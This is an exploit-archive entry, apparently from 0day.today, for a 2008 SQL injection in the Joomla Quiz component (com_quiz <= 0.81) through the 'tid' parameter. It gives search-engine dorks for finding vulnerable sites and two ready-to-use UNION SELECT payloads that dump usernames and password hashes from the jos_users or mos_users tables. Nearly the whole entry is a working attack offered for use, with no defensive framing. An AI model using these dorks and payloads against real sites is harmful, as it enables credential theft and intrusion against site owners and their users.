id: 2639
date: 02/14/2008
title: Joomla Component Quiz <= 0.81 (tid) SQL Injection Vulnerability
author: S@BUN
cves: 

===============================================================
Joomla Component Quiz <= 0.81 (tid) SQL Injection Vulnerability
===============================================================



###############################################################
#
# joomla SQL Injection(com_quiz)user_tst_shw
#
#
################################################################
#
# DORK 1 : allinurl: com_quiz"tid"
#
# DORK 2 : allinurl: com_quiz
#
################################################################
EXPLOIT :

ALL PASSWORD AND USERNAME UNDER PAGE

EXAMPLE: AFTER tid add EXPLOITS

www.xxxxxxxx.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOIT]

EXPLOIT=1=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOIT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*




#  0day.today [2023-03-27]  #